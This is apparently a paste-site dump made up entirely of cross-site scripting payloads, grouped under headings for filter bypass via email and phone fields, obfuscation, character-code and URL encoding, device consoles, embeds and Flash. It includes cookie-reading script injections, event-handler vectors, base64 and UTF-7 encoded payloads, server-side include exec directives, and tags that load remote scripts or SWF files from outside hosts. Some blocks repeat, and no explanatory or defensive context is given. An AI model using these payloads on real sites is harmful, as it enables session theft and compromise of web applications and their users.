- -1<object classid="clsid:..." codebase="javascript:document.cookie=true;">
- -1<style><!--</style><script>document.cookie=true;//--></script>
- -1<<script>document.cookie=true;</script>
- -1<script>document.cookie=true;//--></script>
- -1<!-- -- --><script>document.cookie=true;</script><!-- -- -->
- -1<img src="blah"onmouseover="document.cookie=true;">
- -1<img src="blah>" onmouseover="document.cookie=true;">
- -1<xml src="javascript:document.cookie=true;">
- -1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
- -1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
- Cross Site Scripting Strings Restriction Bypass Mail:
- >"<iframe src=http://vulnerability-lab.com/>@gmail.com
- >"<script>alert(document.cookie)</script><div style="1@gmail.com
- >"<script>alert(document.cookie)</script>@gmail.com
- <iframe src=http://vulnerability-lab.com/>@gmail.com
- <script>alert(document.cookie)</script><div style="1@gmail.com
- <script>alert(document.cookie)</script>@gmail.com
- Cross Site Scripting Strings Restriction Bypass Phone:
- +49/>"<iframe src=http://vulnerability-lab.com>1337
- "><iframe src='' onload=alert('mphone')>
- <iframe src=http://vulnerability-lab.com>1337+1
- Cross Site Scripting Strings Restriction Bypass Obfuscation
- >“<ScriPt>ALeRt("VlAb")</scriPt>
- >"<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe>
- Cross Site Scripting Strings Restriction Bypass String to Charcode
- <html><body>
- <button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
- 101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
- 10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
- om.Char.Code</button></body></html>
- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT>
- '';!--"<CrossSiteScripting>=&{()}
- Cross Site Scripting Strings Restriction Bypass encoded frame url
- %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
- %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
- %73%63%72%69%70%74%3E
- Cross Site Scripting Strings via Console:
- set vlan name 1337 <script>alert(document.cookie)</script>
- set system name <iframe src=http://www.vulnerability-lab.com>
- set system location "><iframe src=a onload=alert("VL") <
- set system contact <script>alert('VL')</script>
- insert <script>alert(document.cookie)</script>
- add <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"-->
- add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com
- add topic <iframe src=http://www.vulnerability-lab.com>
- add name <script>alert('VL')</script>
- perl -e 'print "<IMG SRC=java\0script:alert(\"CrossSiteScripting\")>";' > out
- perl -e 'print "<SCR\0IPT>alert(\"CrossSiteScripting\")</SCR\0IPT>";' > out
- <!--[if gte IE 4]> <SCRIPT>alert('CrossSiteScripting');</SCRIPT> <![endif]-->
- Cross Site Scripting Strings on per line validation applications:
- <IMG
- SRC
- =
- "
- j
- a
- v
- a
- s
- c
- r
- i
- p
- t
- :
- a
- l
- e
- r
- t
- (
- '
- V
- L
- A
- B
- '
- )
- "
- >
- Cross Site Scripting Strings Embed:
- <EMBED SRC="http://vulnerability-lab.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED>
- <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
- <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
- Cross Site Scripting Strings Action Script:
- <object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/hack.swf" width="300" height="300">
- <param name="movie" value="http://www.subhohalder.com/xysecteam.swf" />
- <param name="quality" value="high" />
- <param name="scale" value="noscale" />
- <param name="salign" value="LT" />
- <param name="allowScriptAccess" value="always" />
- <param name="menu" value="false" />
- </object>
- <SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>
- <<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT>
- <SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js?<B>
- <SCRIPT SRC=//vulnerability-lab.com/.js>
- <SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT>
- <SCRIPT a=">" SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
- <SCRIPT a=`>` SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
- <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
- </TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT>
- <IMG SRC="javascript:alert('CrossSiteScripting');">
- <IMG SRC=javascript:alert('CrossSiteScripting')>
- <IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')>
- <IMG SRC=javascript:alert("CrossSiteScripting")>
- <IMG SRC=`javascript:alert("RM'CrossSiteScripting'")`>
- <IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>">
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC="jav ascript:alert('CrossSiteScripting');">
- <IMG SRC="jav	ascript:alert('CrossSiteScripting');">
- <IMG SRC="jav
ascript:alert('CrossSiteScripting');">
- <IMG SRC="jav
ascript:alert('CrossSiteScripting');">
- <IMG SRC="  javascript:alert('CrossSiteScripting');">
- <IMG SRC="javascript:alert('CrossSiteScripting')"
- <IMG DYNSRC="javascript:alert('CrossSiteScripting')">
- <IMG LOWSRC="javascript:alert('CrossSiteScripting')">
- <IMG SRC='vbscript:msgbox("CrossSiteScripting")'>
- <IMG SRC="mocha:[code]">
- <IMG SRC="livescript:[code]">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');">
- <META HTTP-EQUIV="Link" Content="<http://vulnerability-lab.com/CrossSiteScripting.css>; REL=stylesheet">
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('CrossSiteScripting')</SCRIPT>">
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-
- <OBJECT TYPE="text/x-scriptlet" DATA="http://vulnerability-lab.com/scriptlet.html"></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT>
- <STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE>
- <STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE>
- <STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE>
- <STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE>
- <STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting
- <STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE>
- <DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
- <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
- <DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
- <DIV STYLE="width: expression(alert('CrossSiteScripting'));">
- <LAYER SRC="http://vulnerability-lab.com/script.html"></LAYER>
- <LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');">
- <LINK REL="stylesheet" HREF="http://vulnerability-lab.com/CrossSiteScripting.css">
- <BODY BACKGROUND="javascript:alert('CrossSiteScripting')">
- <BODY ONLOAD=alert('CrossSiteScripting')>
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("CrossSiteScripting")>
- <iframe src=http://vulnerability-lab.com/index.html <
- <TABLE BACKGROUND="javascript:alert('CrossSiteScripting')">
- <TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')">
- <BGSOUND SRC="javascript:alert('CrossSiteScripting');">
- <BR SIZE="&{alert('CrossSiteScripting')}">
- <A HREF="http://server.com/">CrossSiteScripting</A>
- <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A>
- <A HREF="http://1113982867/">CrossSiteScripting</A>
- <A HREF="javascript:document.location='http://www.vulnerability-lab.com/'">CrossSiteScripting</A>
- <BASE HREF="javascript:alert('CrossSiteScripting');//">
- \";alert('CrossSiteScripting');//
- <INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScripting');">
- <CrossSiteScripting STYLE="behavior: url(CrossSiteScripting.htc);">
- ¼script¾alert(¢CrossSiteScripting¢)¼/script¾
- <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert('CrossSiteScripting'))">
- <CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))"> exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*"); CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(alert("CrossSiteScripting"))'>
- a="get";
- b="URL(\"";
- c="javascript:";
- d="alert('CrossSiteScripting');\")";
- eval(v+l+a+b);
- <HTML xmlns:CrossSiteScripting>
- <?import namespace="CrossSiteScripting" implementation="http://ha.ckers.org/CrossSiteScripting.htc">
- <CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting>
- <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('CrossSiteScripting');">]]>
- </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:alert('CrossSiteScripting')"></B></I></XML>
- <SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- <XML SRC="CrossSiteScriptingtest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <HTML><BODY>
- <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
- <?import namespace="t" implementation="#default#time2">
- <t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>alert("CrossSiteScripting")</SCRIPT>">
- </BODY></HTML>
- <SCRIPT SRC="http://vulnerability-lab.com/CrossSiteScripting.jpg"></SCRIPT>
- <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"-->
- <? echo('<SCR)';
- echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?>
- <IMG SRC="http://www.vulnerability-lab.com/file.php?variables=malicious">
- Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser
- <script>[CDATA[prompt(1);]]</script>
- <div onclick="setTimeout('prompt(9)',1000)">
- eval("prompt(3)")
- "><img src=x onabort=prompt(1)>
- "><img src=x oncanplay=prompt(1)>
- "><img src=x oncanplaythrough=prompt(1)>
- "><img src=x ondurationchange=prompt(1)>
- "><img src=x onemptied=prompt(1)>
- "><img src=x onended=prompt(1)>
- "><img src=x onerror=prompt(1)>
- "><img src=x onloadeddata=prompt(1)>
- "><img src=x onloadedmetadata=prompt(1)>
- "><img src=x onloadstart=prompt(1)>
- "><img src=x onpause=prompt(1)>
- "><img src=x onplay=prompt(1)>
- "><img src=x onplaying=prompt(1)>
- "><img src=x onprogress=prompt(1)>
- "><img src=x onratechange=prompt(1)>
- "><img src=x onseeked=prompt(1)>
- "><img src=x onseeking=prompt(1)>
- "><img src=x onstalled=prompt(1)>
- "><img src=x onsuspend=prompt(1)>
- "><img src=x ontimeupdate=prompt(1)>
- "><img src=x onvolumechange=prompt(1)>
- "><img src=x onwaiting=prompt(1)>
- "><img src=x onshow=prompt(1)>
- "><img src=x onclick=prompt(1)>
- "><img src=x ondblclick=prompt(1)>
- "><img src=x ondrag=prompt(1)>
- "><img src=x ondragend=prompt(1)>
- "><img src=x ondragenter=prompt(1)>
- "><img src=x ondragleave=prompt(1)>
- "><img src=x ondragover=prompt(1)>
- "><img src=x ondragstart=prompt(1)>
- "><img src=x ondrop=prompt(1)>
- "><img src=x onmousedown=prompt(1)>
- "><img src=x onmousemove=prompt(1)>
- "><img src=x onmouseout=prompt(1)>
- "><img src=x onmouseover=prompt(1)>
- "><img src=x onmouseup=prompt(1)>
- "><img src=x onmousewheel=prompt(1)>
- "><img src=x onscroll=prompt(1)>
- "><img src=x onwheel=prompt(1)>
- "><img src=x onerror=prompt(1)>
- [Click here](javascript:alert(1))
- "></script><svg/onload=alert("XSS")>
- <iframe src="http://businessinfo.co.uk/labs/xss/xss.swf"></iframe>
- '|alert('xss')|'
- +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
- #onmouseover=prompt(1)
- "><img src=x onerror=prompt(1)>
- <script>alert(1)</script>
- %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E
- <iframe src=http://test.de>
- <iframe src=http://test.de>
- PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
- javascript:alert(1)
- <script>
- ></SCRIPT>
- "><img src=x onmousemove=prompt(1)>
- "><img src=x onmouseout=prompt(1)>
- "><img src=x onmouseover=prompt(1)>
- <body onload=prompt(1);>
- <select autofocus onfocus=alert(1)>
- <textarea autofocus onfocus=alert(1)>
- <keygen autofocus onfocus=alert(1)>
- <video><source onerror="javascript:alert(1)">
- <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
- <body >
- <textarea autofocus onfocus=confirm(1)>
- <video><source>
- <body language=vbsonload=alert-1
- </textarea>//
- <body language=vbsonload=alert-1 // Works with IE8
- <command onmouseover ="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command> // Works with IE8
- <q/oncut=open()>
- <iframe/src="data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">.
- <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
- <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
- <object data="data:text/html;base64,PHNjcmlwdD4NCnNldFRpbWVvdXQobXlGdW5jdGlvbiwgMzAwMDApOw0KZnVuY3Rpb24gbXlGdW5jdGlvbigpIHsNCiAgICBhbGVydCgnaG9nYXJ0aCcpOw0KfQ0KPC9zY3JpcHQ+">
- <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
- <body >
- <textarea autofocus onfocus=confirm(1)>
- <video><source>
- <body language=vbsonload=alert-1
- </textarea>//
- <body language=vbsonload=alert-1 // Works with IE8
- <command onmouseover ="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command> // Works with IE8
- <q/oncut=open()>
- <iframe/src="data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">.
- <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
- <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
- <object data="data:text/html;base64,PHNjcmlwdD4NCnNldFRpbWVvdXQobXlGdW5jdGlvbiwgMzAwMDApOw0KZnVuY3Rpb24gbXlGdW5jdGlvbigpIHsNCiAgICBhbGVydCgnaG9nYXJ0aCcpOw0KfQ0KPC9zY3JpcHQ+">
- <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Add Comment
Please, Sign In to add comment